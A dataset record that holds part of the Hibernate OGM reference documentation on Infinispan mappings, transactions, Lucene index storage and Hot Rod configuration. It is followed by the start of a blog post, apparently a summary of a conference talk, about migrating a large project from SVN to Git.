@MapKeyColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n @MapKeyColumn(name = \"addressType\")\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `User` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n ^.^| [\"id\"], [\"user_001\"] | id | \"user_001\"\n|===\n\n.Content of the `Address` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"address_001\"] | id | \"address_001\"\n | city | \"Rome\"\n\n.2+^.^| [\"id\"], [\"address_002\"] | id | \"address_002\"\n | city | \"Paris\"\n|===\n\n.Content of the `associations_User_address` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.6+^.^| [\"User_id\"], \"user_001\"]\n.3+^.^| [\"User_id\", \"addressType\"], [\"user_001\", \"home\"]\n | User_id\n | \"user_001\"\n\n | addressesType\n | \"home\"\n\n | addresses_id\n | \"address_001\"\n\n\n.3+^.^| [\"User_id\", \"addressType\"], [\"user_001\", \"work\"]\n | User_id\n | \"user_002\"\n\n | addressesType\n | \"work\"\n\n | addresses_id\n | \"address_002\"\n|===\n====\n\n.Unidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class JavaUserGroup {\n\n @Id\n private String jugId;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Member {\n\n @Id\n private String id;\n private String name;\n\n @ManyToOne\n private JavaUserGroup memberOf;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `JavaUserGroup` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"jugId\"], [\"summer_camp\"] | jugId | \"summer_camp\"\n | name | \"JUG Summer Camp\"\n|===\n\n.Content of the `Member` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"member_id\"], [\"emmanuel\"] | member_id | \"emmanuel\"\n | name | \"Emmanuel Bernard\"\n | memberOf_jug_id | \"summer_camp\"\n\n.3+^.^| [\"member_id\"], [\"jerome\"] | member_id | \"jerome\"\n | name | \"Jerome\"\n | memberOf_jug_id | \"summer_camp\"\n|===\n====\n\n.Bidirectional many-to-one \n====\n[source, JAVA]\n----\n@Entity\npublic class SalesForce {\n\n @Id\n private String id;\n private String corporation;\n\n @OneToMany(mappedBy = \"salesForce\")\n private Set<SalesGuy> salesGuys = new HashSet<SalesGuy>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class SalesGuy {\n private String id;\n private String name;\n\n @ManyToOne\n private SalesForce salesForce;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `SalesForce` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"red_hat\"] | id | \"red_hat\"\n | corporation | \"Red Hat\"\n|===\n\n.Content of the `SalesGuy` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"id\"], [\"eric\"] | id | \"eric\"\n | name | \"Eric\"\n | salesForce_id | \"red_hat\"\n\n.3+^.^| [\"id\"], [\"simon\"] | id | \"simon\"\n | name | \"Simon\"\n | salesForce_id | \"red_hat\"\n|===\n\n.Content of the `associations_SalesGuy` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"salesForce_id\"], [\"red_hat\"]\n.2+^.^| [\"salesForce_id\", \"id\"], [\"red_hat\", \"eric\"]\n | salesForce_id\n | \"red_hat\"\n\n | id\n | \"eric\"\n\n.2+^.^| [\"salesForce_id\", \"id\"], [\"red_hat\", \"simon\"]\n | salesForce_id\n | \"red_hat\"\n\n | id\n | \"simon\"\n|===\n====\n\n.Unidirectional many-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nThe \"Math\" class has 2 students: John Doe and Mario Rossi\n\nThe \"English\" class has 2 students: Kate Doe and Mario Rossi\n\n.Content of the `ClassRoom` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [1] | id | 1 \n | name | \"Math\"\n\n.2+^.^| [\"id\"], [2] | id | 2 \n | name | \"English\"\n|===\n\n.Content of the `Student` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"john\"] | id | \"john\"\n | name | \"John Doe\"\n\n.2+^.^| [\"id\"], [\"mario\"] | id | \"mario\"\n | name | \"Mario Rossi\"\n\n.2+^.^| [\"id\"], [\"kate\"] | id | \"kate\"\n | name | \"Kate Doe\"\n|===\n\n.Content of the `associations_ClassRoom_Student` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"ClassRoom_id\"], [1]\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [1, \"mario\"]\n | ClassRoom_id\n | 1 \n\n | students_id\n | \"mario\"\n\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [1, \"john\"]\n | ClassRoom_id\n | 1 \n\n | students_id\n | \"john\"\n\n.4+^.^| [\"ClassRoom_id\"], [2]\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [2, \"kate\"]\n | ClassRoom_id\n | 2 \n\n | students_id\n | \"kate\"\n\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [2, \"mario\"]\n | ClassRoom_id\n | 2 \n\n | students_id\n | \"mario\"\n|===\n====\n\n.Bidirectional many-to-many \n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany( mappedBy = \"bankAccounts\" )\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nDavid owns 2 accounts: \"012345\" and \"ZZZ-009\"\n\n.Content of the `AccountOwner` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"David\"] | id | \"David\"\n | SSN | \"0123456\"\n|===\n\n.Content of the `BankAccount` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"account_1\"] | id | \"account_1\"\n | accountNumber | \"X2345000\"\n\n.2+^.^| [\"id\"], [\"account_2\"] | id | \"account_2\"\n | accountNumber | \"ZZZ-009\"\n|===\n\n.Content of the `AccountOwner_BankAccount` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.2+^.^| [\"bankAccounts_id\"], [\"account_1\"]\n.2+^.^| [\"bankAccounts_id\", \"owners_id\"], [\"account_1\", \"David\"]\n | bankAccounts_id\n | \"account_1\"\n\n | owners_id\n | \"David\"\n\n.2+^.^| [\"bankAccounts_id\"], [\"account_2\"]\n.2+^.^| [\"bankAccounts_id\", \"owners_id\"], [\"account_2\", \"David\"]\n | bankAccounts_id\n | \"account_2\"\n\n | owners_id\n | \"David\"\n\n.4+^.^| [\"owners_id\"], [\"David\"]\n.2+^.^| [\"owners_id\", \"banksAccounts_id\"], [\"David\", \"account_1\"]\n | bankAccounts_id\n | \"account_1\"\n\n | owners_id\n | \"David\"\n\n.2+^.^| [\"owners_id\", \"banksAccounts_id\"], [\"David\", \"account_2\"]\n | bankAccounts_id\n | \"account_2\"\n\n | owners_id\n | \"David\"\n\n|===\n====\n\n[[ogm-infinispan-transactions]]\n\n==== Transactions\n\nInfinispan supports transactions and integrates with any standard JTA `TransactionManager`;\nthis is a great advantage for JPA users as it allows to experience a _similar_ behaviour\nto the one we are used to when we work with RDBMS databases.\n\nThis capability is only available to Infinispan Embedded users: the transactional integration\ncapabilities are not exposed to the Hot Rod clients.\n\nIf you're having Hibernate OGM start and manage Infinispan,\nyou can skip this as it will inject the same `TransactionManager` instance\nwhich you already have set up in the Hibernate \/ JPA configuration.\n\nIf you are providing an already started Infinispan CacheManager instance\nby using the [acronym]`JNDI` lookup approach,\nthen you have to make sure the CacheManager is using the same `TransactionManager`\nas Hibernate:\n\n.Configuring a JBoss Standalone TransactionManager lookup in Infinispan configuration\n====\n[source, XML]\n----\n<default>\n <transaction\n transactionMode=\"TRANSACTIONAL\"\n transactionManagerLookupClass=\n \"org.infinispan.transaction.lookup.JBossStandaloneJTAManagerLookup\" \/>\n<\/default>\n----\n====\n\nInfinispan supports different transaction modes like `PESSIMISTIC` and `OPTIMISTIC`,\nsupports [acronym]`XA` recovery and provides many more configuration options;\nsee the http:\/\/infinispan.org\/documentation\/[Infinispan User Guide]\nfor more advanced configuration options.\n\n[[ogm-infinispan-indexstorage]]\n\n==== Storing a Lucene index in Infinispan\n\nHibernate Search, which can be used for advanced query capabilities (see <<ogm-query>>),\nneeds some place to store the indexes for its embedded `Apache Lucene` engine.\n\nA common place to store these indexes is the filesystem\nwhich is the default for Hibernate Search;\nhowever if your goal is to scale your NoSQL engine on multiple nodes\nyou need to share this index.\nNetwork sharing file systems are a possibility but we don't recommended that.\nOften the best option is to store the index\nin whatever NoSQL database you are using (or a different dedicated one).\n\n[TIP]\n====\nYou might find this section useful even if you don't intend to store your data in Infinispan.\n====\n\nThe Infinispan project provides an adaptor to plug into Apache Lucene,\nso that it writes the indexes in Infinispan and searches data in it.\nSince Infinispan can be used as an application cache to other NoSQL storage engines\nby using a CacheStore (see <<ogm-infinispan-storage>>)\nyou can use this adaptor to store the Lucene indexes\nin any NoSQL store supported by Infinispan:\n\n* JDBC databases\n* Cassandra\n* Filesystem (but locked correctly at the Infinispan level)\n* MongoDB\n* HBase\n* LevelDB\n* A secondary (independent) Infinispan grid\n\n\nHow to configure it? Here is a simple cheat sheet to get you started with this type of setup:\n\n* Add `org.infinispan:infinispan-directory-provider:{infinispanVersion}` to your dependencies\n* set these configuration properties:\n\n** `hibernate.search.default.directory_provider = infinispan`\n** `hibernate.search.default.exclusive_index_use = false`\n** `hibernate.search.infinispan.configuration_resourcename =` [infinispan configuration filename]\n\nThis configuration is simple and will work fine in most scenarios, but keep in mind that using\n'exclusive_index_use' will be neither fast nor scalable.\nFor high performance, high concurrency or production use please refer to the\nhttp:\/\/infinispan.org\/documentation\/[Infinispan documentation] for more advanced configuration options and tuning.\n\nThe referenced Infinispan configuration should define a `CacheStore`\nto load\/store the index in the NoSQL engine of choice.\nIt should also define three cache names:\n\n.Infinispan caches used to store indexes\n[cols=\"1,2,1\", options=\"header\"]\n|===============\n|Cache name|Description|Suggested cluster mode\n|LuceneIndexesLocking|Transfers locking information. Does not need a cache\n store.|replication\n|LuceneIndexesData|Contains the bulk of Lucene data. Needs a cache\n store.|distribution + L1\n|LuceneIndexesMetadata|Stores metadata on the index segments. Needs a cache\n store.|replication\n|===============\n\nThis configuration is not going to scale well on write operations:\nto do that you should read about the master\/slave and sharding options in Hibernate Search.\nThe complete explanation and configuration options can be found in the\nhttps:\/\/docs.jboss.org\/hibernate\/search\/{hibernate-search-major-minor-version}\/reference\/en-US\/html_single\/#infinispan-directories[Hibernate Search Reference Guide]\n\nSome NoSQL support storage of Lucene indexes directly,\nin which case you might skip the Infinispan Lucene integration\nby implementing a custom `DirectoryProvider` for Hibernate Search.\nYou're very welcome to share the code\nand have it merged in Hibernate Search for others to use, inspect, improve and maintain.\n\n[[ogm-infinispan-remote]]\n\n=== Hibernate OGM & Infinispan Server over Hot Rod\n\nIn this section we'll see how to configure Hibernate OGM to connect to\n\"Infinispan Server using the Hot Rod protocol\", which we will call \"Infinispan Remote\"\nfor brevity and to differentiate it from \"Infinispan Embedded\".\n\nIn this mode Hibernate OGM can not boostrap or otherwise control the lifecycle\nof Infinispan, so we will assume that you already have a cluster of Infinispan Server\nnodes running.\nFor instructions on setting one up, see the http:\/\/infinispan.org\/docs\/stable\/server_guide\/server_guide.html[Infinispan Server Guide].\n\nThe good news is that - since it's a separate service - there won't be much to configure\nin Hibernate OGM.\n\n[CAUTION]\n====\nThe Hibernate OGM support for Infinispan Remote is considered experimental.\nIn particular, the storage format is not set in stone.\n====\n\n==== Adding Infinispan Remote dependencies\n\nTo use Hibernate OGM to connect to an Infinispan Server using the Hot Rod protocol, you will need the following extension\nand its transitive dependencies (which include, among others, the Hot Rod client):\n \n[source, XML]\n[subs=\"verbatim,attributes\"]\n----\n<dependency>\n <groupId>org.hibernate.ogm<\/groupId>\n <artifactId>hibernate-ogm-infinispan-remote<\/artifactId>\n <version>{hibernate-ogm-version}<\/version>\n<\/dependency>\n----\n\n==== Configuration properties for Infinispan Remote\n\nFirst, let Hibernate know that you want to use the OGM Infinispan Remote datastore by setting the\n`hibernate.ogm.datastore.provider` property to `infinispan_remote`.\n\nThe next step is to configure the Hot Rod client.\nYou have two options:\n\n* either provide a resource file containing all Hot Rod client configuration properties\n* or include all the Hot Rod client configuration properties with a custom prefix, as explained below.\n\nTo use an external configuration resource, set the `hibernate.ogm.infinispan_remote.configuration_resource_name`\nconfiguration property to the resource name.\n\n.Using a separate resource to configure the Hot Rod client\n====\n[source, XML]\n----\n<?xml version=\"1.0\"?>\n<persistence xmlns=\"http:\/\/java.sun.com\/xml\/ns\/persistence\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/persistence http:\/\/java.sun.com\/xml\/ns\/persistence\/persistence_2_0.xsd\"\n\tversion=\"2.0\">\n\n\t<persistence-unit name=\"ogm-with-hotrod\">\n\t\t<provider>org.hibernate.ogm.jpa.HibernateOgmPersistence<\/provider> # <1>\n\t\t<properties>\n\t\t\t<property name=\"hibernate.ogm.datastore.provider\"\n\t\t\t\tvalue=\"infinispan_remote\" \/> # <2>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.configuration_resource_name\"\n\t\t\t\tvalue=\"hotrodclient.properties\" \/> # <3>\n\t\t<\/properties>\n\t<\/persistence-unit>\n<\/persistence>\n----\n<1> Choose Hibernate OGM as JPA Provider\n<2> pick `infinispan_remote` as datastore\n<3> point to the Hot Rod configuration file\n\n[source]\n----\ninfinispan.client.hotrod.server_list = 127.0.0.1:11222\ninfinispan.client.hotrod.tcp_no_delay = true\ninfinispan.client.hotrod.tcp_keep_alive = false\n\n## below is connection pooling config\nmaxActive=-1\nmaxTotal = -1\nmaxIdle = -1\nwhenExhaustedAction = 1\ntimeBetweenEvictionRunsMillis = 120000\nminEvictableIdleTimeMillis = 300000\ntestWhileIdle = true\nminIdle = 1\n----\n====\n\nAlternatively you can embed the Hot Rod properties in your Hibernate (or JPA) configuration\nfile, but you'll have to replace the `infinispan.client.hotrod.` prefix with the custom\nprefix `hibernate.ogm.infinispan_remote.client.`.\n\nSome of the Hot Rod client configuration properties don't normally use a prefix - specifically\nall properties relating to connection pooling as in the previous example - these will also\nneed to use the `hibernate.ogm.infinispan_remote.client.` prefix.\n\nProperties set with the `hibernate.ogm.infinispan_remote.client.` prefix will override the same\nproperties configured using an external reosurce file.\n\n.Embedding the Hot Rod client configuration properties in the Hibernate configuration\n====\n[source, XML]\n----\n<?xml version=\"1.0\"?>\n<persistence xmlns=\"http:\/\/java.sun.com\/xml\/ns\/persistence\"\n\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/persistence http:\/\/java.sun.com\/xml\/ns\/persistence\/persistence_2_0.xsd\"\n\tversion=\"2.0\">\n\n\t<persistence-unit name=\"ogm-with-hotrod\">\n\t\t<provider>org.hibernate.ogm.jpa.HibernateOgmPersistence<\/provider> # <1>\n\t\t<properties>\n\t\t\t<property name=\"hibernate.ogm.datastore.provider\"\n\t\t\t\tvalue=\"infinispan_remote\" \/> # <2>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.server_list\"\n\t\t\t\tvalue=\"127.0.0.1:11222\" \/> # <3>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.tcp_no_delay\"\n\t\t\t\tvalue=\"true\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.tcp_keep_alive\"\n\t\t\t\tvalue=\"false\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxActive\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxTotal\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.maxIdle\"\n\t\t\t\tvalue=\"-1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.whenExhaustedAction\"\n\t\t\t\tvalue=\"1\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.timeBetweenEvictionRunsMillis\"\n\t\t\t\tvalue=\"120000\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.minEvictableIdleTimeMillis\"\n\t\t\t\tvalue=\"300000\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.testWhileIdle\"\n\t\t\t\tvalue=\"true\" \/>\n\t\t\t<property name=\"hibernate.ogm.infinispan_remote.client.minIdle\"\n\t\t\t\tvalue=\"1\" \/>\n\t\t<\/properties>\n\t<\/persistence-unit>\n<\/persistence>\n----\n<1> Choose Hibernate OGM as JPA Provider\n<2> pick `infinispan_remote` as datastore\n<3> include Hot Rod configuration properties, just replacing\/adding the OGM prefix.\n====\n\nIn the next section we'll see a couple more advanced properties which might be of interest.\n\nhibernate.ogm.infinispan_remote.schema_capture_service::\nIf you set this to an implementation of `org.hibernate.ogm.datastore.infinispanremote.schema.spi.SchemaCapture` you\ncan collect any generated Protobuf Schema. Could be useful for integrations with other tools.\nYou can either provide a fully qualified classname or a `SchemaCapture`, or pass an instance of a `SchemaCapture`\nin the configuration properties, if you're booting Hibernate programmatically.\n\nhibernate.ogm.infinispan_remote.schema_package_name::\nDefines the package name of the generated Protobuf schema. Defaults to `HibernateOGMGenerated`.\nUseful to isolate different applications using the same Infinispan Server instance.\n\n\n==== Data encoding: Protobuf Schema\n\nUsing the _Infinispan Remote_ backend your data will be encoded using Protocol Buffers,\nalso known as Protobuf.\n\n> Protocol Buffers are a language-neutral, platform-neutral\n> extensible mechanism for serializing structured data\n> -- https:\/\/developers.google.com\/protocol-buffers\/\n\nThis encoding strategy will be used both during _transmission_ to and from the datagrid, and\nas a _storage format_ on the Infinispan Server.\n\nTypical usage of Google's developer tools for Java would require you to download the `protoc`\ncompiler to generate Java stubs; you won't need that when using Hibernate OGM as the backend\nwill generate the encoding and decoding functions on the fly from your entities.\n\nThe benefit of having Hibernate OGM generate the schema for you will make it easier to get\nstarted, but there's a drawback: you are not directly in control of the protobuf schema\nIt will deploy this schema - or expect a compatible schema to be deployed - as it will use\nits generated codecs to read and write data to the Infinispan Server.\n\nThe protobuf technology is designed to allow evolution of your schema: you can deploy a\ndifferent schema on the Infinispan Server than the one OGM expects, but this is an advanced\ntopic and you'll have to make sure the deployed schema is compatible with the one OGM is\ngenerating and using.\n\nAnother reason to make sure the deployed protobuf schema is a _compatible evolution_ of\na previous schema, is to make sure you can still read data which is already stored in\nthe datagrid.\n\n[IMPORTANT]\n====\nRemember that the Protobuf schema is used both during _transmission_ and _storage_.\nThe fact that it's used also during _transmission_ of your data is a key difference to the\nschema of a SQL database.\n\nFor example even if a property \"A\" is not nullable in terms of storage, you will still\nwant it to be flagged as `optional` in a protobuf schema to allow, for example, retrieving\na subset of data properties without having to always retrieve the property \"A\".\n====\n\nYou don't need to do anything regarding the schema: Hibernate OGM will automatically\ndeploy it to the Infinispan datagrid at boostrap of Hibernate.\nYou might want to keep this in mind though, both to be able to evolve your schema\nwithout data loss, and to be able to generate decoders for other Infinispan clients not\nusing Hibernate OGM.\n\nThe deployed schemas can be fetched from the Infinispan Server; Hibernate OGM also\nlogs the generated schemas at `INFO` level in the logging category\n`org.hibernate.ogm.datastore.infinispanremote.impl.protobuf.SchemaDefinitions`.\n\n==== Storage Principles of the Infinispan Remote dataprovider\n\nThis is actually very simple.\n\nImagine you were mapping your entities to a traditional, table based [acronym]`RDBMS`;\nnow instead of tables, you have caches. Each cache has a name, and a consistent schema,\nand for each cache we define a key with some properties (the id, aka the primary key).\n\nRelations are mapped by encoding a \"foreign key\"; these are used either as keys perform\na key lookup on another table, or can be used in queries on other tables to identify\nrelations which have a higher than one cardinality.\n\nSo let's highlight the differences with the relational world:\n\nReferential integrity::\nWhile we can use relations based on foreign keys, Infinispan has no notion of referential integrity.\nHibernate is able to maintain the integrity as it won't \"forget\" stale references, but since\nthe storage doesn't support transactions either it is possible to interrupt Hibernate OGM\nduring such maintenance and introduce breaks of integrity.\n\nA key. And a Value.::\nIn a key\/value store the two elements _key_ and _value_ are different, separate objects.\nThe schema - and consequentially all operations - generated by Hibernate OGM will treat\nand encode these two objects separately. You will notice that the attributes of the key\nare encoded in the value *as well*, as it is not possible to run e.g. range queries\non attributes of keys.\n\nNo Sequences, no auto-incrementing values::\nInfinispan does not support sequences, yet allows concurrent \"compare and set\" operations;\nHibernate OGM makes use of such CAS operations to emulate the need of sequences or auto-incrementing\nprimary keys if your entity mapping uses them, however this solution might not work\nunder high load: make sure to use a different strategy, such as assigning IDs explicitly,\nor using the `org.hibernate.id.UUIDGenerator` generator.\nHibernate OGM will log a warning if it detects excessive spinning on such CAS operations.\n\nNot mapped to JDBC types, but to Protobuf types::\nRather than mapping your Java properties to corresponding JDBC (SQL) types, your Java\nproperties are mapped to Protobuf types.\nSee the https:\/\/developers.google.com\/protocol-buffers\/docs\/proto#scalar[protobuf documentation]\nfor an overview of protocol buffer \"primitive\" types.\n\n.Example auto-generated Protobuf Schema for a simple entity\n====\n[source, JAVA]\n----\nimport javax.persistence.Column;\nimport javax.persistence.Entity;\nimport javax.persistence.Id;\n\n@Entity\npublic class Hypothesis {\n\n\t@Id String id;\n\n\tString description;\n\n\t@Column(name = \"pos\")\n\tint position;\n\n}\n----\n[source]\n----\npackage HibernateOGMGenerated; # <1>\n\nmessage Hypothesis_id { # <2>\n\trequired string id = 1;\n}\n\nmessage Hypothesis {\n\trequired string id = 1;\n\toptional string description = 2;\n\toptional int32 pos = 3; # <3>\n}\n----\n<1> The default Protobuf package name.\n<2> A dedicated message type for the Key of the Key\/Value pair\n<3> The `pos` attribute name respects the option of the `@Column` annotation\n====\n\nThe above example shows how a Protobuf schema looks like, as automatically generated from a mapped entity.\nAny property type supported by Hibernate ORM will be converted to a matching Protobuf type.\n\n===== Each Table requires a Cache with the same name\n\nIn a relational database world, when Hibernate defines the schema this implicitly creates the tables;\nthis is not the case on Infinispan.\n\nWith Infinispan, the _Protobuf Schema_ just unlocks the capability to transmit messages with\nsuch payloads (read\/write), and allows the remote servers to process the fields, for example\nto execute queries and extract projections out of the stored entries.\nSo this establishes a transmission and storage encoding contract, but doesn't actually\nstart or allocate any storing Cache.\n\nHibernate OGM by convention will write to several named ``Cache``s, mapping each \"table name\"\nto a \"cache name\". In the above example, when having an `Hypothesis` entity this will\nwrite to a Cache named `Hypothesis`.\n\nThe benefit is that you can tune each cache (each \"table\") independently; for example you could\nconfigure the caches for the most important data to have a synchronous CacheStore which replicates\ndata to a relational database, and have less important entries use an asynchronous CacheStore,\nor none at all, to favour performance over redundancy.\n\nThe drawback of this design choice is that each named cache must be pre-defined in the Infinispan\nServer configuration: at this point, the Hot Rod protocol is not allowed to start missing caches\nso Hibernate OGM can not define the missing tables automatically.\nIt generates the encoding protobuf, but you have to list the Cache names in the server configuration.\n\n[WARNING]\n====\nFor each \"table name\" your model would generate on a relational database, you have to define\na matching Cache on the Infinispan Server.\n\nIf any Cache is missing, Hibernate OGM will fail to start and list which table names were\nexpected, but not found. We plan to automate the creation of missing caches in the future.\n====\n\n\n==== Known Limitations & Future improvements\n\nThe Infinispan Remote dataprovider has some known limitations, some of which are\nunsolvable without further development of Infinispan itself.\n\nTransaction Support::\nWe're eagerly waiting for Infinispan to support transactions over Hot Rod, as it\nalready provides this feature in Embedded Mode.\n\nQueries::\nAt this point the Hibernate OGM backend is able to run the queries it needs to materialize\nrelations, but does not yet translate JPQL queries nor Criteria queries to the\nInfinispan remote queries.\n\nIndexing::\nInfinispan supports Hibernate Search annotations directly embedded within its protobuf\nschema definitions; this would enable the queries on them to use indexes.\nHibernate OGM doesn't generate these annotations in the schemas it generates yet.\n\nNative support for write skew checks::\nThe Hot Rod client has native support for versioning of datagrid entries, yet this is\nnot supported on all of the client APIs. For Hibernate OGM to be able to consistently\nuse versioning requires enhancements to the Hot Rod client API.\n\nEnums::\nProtobuf has native support for Enum types, yet the JPA annotations force to choose\nbetween ordinal or string encoding. We might have to introduce a \"native\" encoding,\nprobably via a novel mapping annotation.\nHibernate OGM supports the native protobuf Encoding but the JPA metadata will always\nforce the ordinal or string representations.\n\nNesting and embedding::\nThe Protobuf schema could allow us to embed objects, including series of objects,\nas nested elements. This could allow mappings similar to the document based NoSQL\nstores, such as our MongoDB dialect, but is not supported yet.\n\nAutomatic creating of ``Cache``s::\nWhen deploying the _Protobuf Schema_, we should also automatically define and start\nthe needed Caches if they are not defined.\nThis is currently not allowed over the Hot Rod protocol.\n\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"890b0a9971eb7c6228e3e341a9574c6bc6e26219","subject":"Update 2015-04-30-How-Git-saved-our-project-or-nearly.adoc","message":"Update 2015-04-30-How-Git-saved-our-project-or-nearly.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2015-04-30-How-Git-saved-our-project-or-nearly.adoc","new_file":"_posts\/2015-04-30-How-Git-saved-our-project-or-nearly.adoc","new_contents":"= How Git saved our project? (or nearly...)\n:published_at: 2015-04-30\n:hp-tags: Devoxx France 2015, Git, migration\n:imagesdir: .\/images\n\nPresented at Devoxx France 2015 by C\u00e9cilia BOSSARD +\nSummary by Thomas SCHWENDER (Softeam StarTech Java)\n\n== An interesting feedback on a migration from SVN to Git\n\nIn a short time (quickies format requires), C\u00e9cilia expounded some advantages and issues when migrating a *really big* project from SVN to Git.\n\nHer project was several millions of code lines, and was having problems when releasing a new version, because of some merge issues. +\nThose last came mainly from the project size, and the number of different branches to merge at this moment.\n\nTo try to solve their problem, they made an analysis to check if they could migrate from SVN to Git, with a https:\/\/www.atlassian.com\/git\/tutorials\/comparing-workflows\/gitflow-workflow[Gitflow workflow].\n\nimage::how-Git-saved-our-project\/gitflow.jpg[title=\"the Gitflow workflow\"]\n\nAfter weeks of analysis, they first conclude that *it was not possible because of the whole size of the project*. +\nWith Git, *you effectively retrieve all the code on your local repository*. You can't do partial checkouts, contrary to SVN (check the note below for a precision on this point).\n\nThen, thinking to http:\/\/git-scm.com\/about[the advantages of the migration], they decided the reduce the size of the project, by cleaning dead code.\nWith that, the 2nd conclusion was let's go to Git!\n\n\n== Tips and things to remember\n\n* With Git, less disk space is required. +\nAs for Git, *branch are only pointers*, contrary to SVN where they are file system copies.\n* Beware of the whole project size! + \nContrary to SVN, Git doesn't allow partial checkouts (feature called http:\/\/svnbook.red-bean.com\/en\/1.7\/svn.advanced.sparsedirs.html[_sparse directories_] in SVN). +\nSo, do not forget the housekeeping, and *clean dead code*!\n+\n[NOTE]\n====\nTo be more precised, since version 1.7.0, Git also enables sparce checkouts *for the working directory* (check http:\/\/schacon.github.io\/git\/git-read-tree.html#_sparse_checkout[here]).\nUnfortunately, *it does not affect the size of the overall local repository* (you *WILL* get the whole thing).\n====\n* Beware of https:\/\/help.github.com\/articles\/dealing-with-line-endings\/[line endings configuration].\n* Beware of the *encoding of your merge tool*. +\nThink to configure it to use UTF-8.\n* *get the `.git` out ouf the Eclipse workspace*, so as not to slow your IDE too much.\n\n\n\n\n\n\n\n","old_contents":"= How Git saved our project? (or nearly...)\n:published_at: 2015-04-30\n:hp-tags: Devoxx France 2015, Git, migration\n:imagesdir: .\/images\n\nPresented at Devoxx France 2015 by C\u00e9cilia BOSSARD +\nSummary by Thomas SCHWENDER (Softeam StarTech Java)\n\n== An interesting feedback on a migration from SVN to Git\n\nIn a short time (quickies format requires), C\u00e9cilia expounded some advantages and issues when migrating a *really big* project from SVN to Git.\n\nHer project was several millions of code lines, and was having problems when releasing a new version, because of some merge issues. +\nThose last came mainly from the project size, and the number of different branches to merge at this moment.\n\nTo try to solve their problem, they made an analysis to check if they could migrate from SVN to Git, with a https:\/\/www.atlassian.com\/git\/tutorials\/comparing-workflows\/gitflow-workflow[Gitflow workflow].\n\nimage::how-Git-saved-our-project\/gitflow.jpg[title=\"the Gitflow workflow\"]\n\nAfter weeks of analysis, they first conclude that *it was not possible because of the whole size of the project*. +\nWith Git, *you effectively retrieve all the code on your local 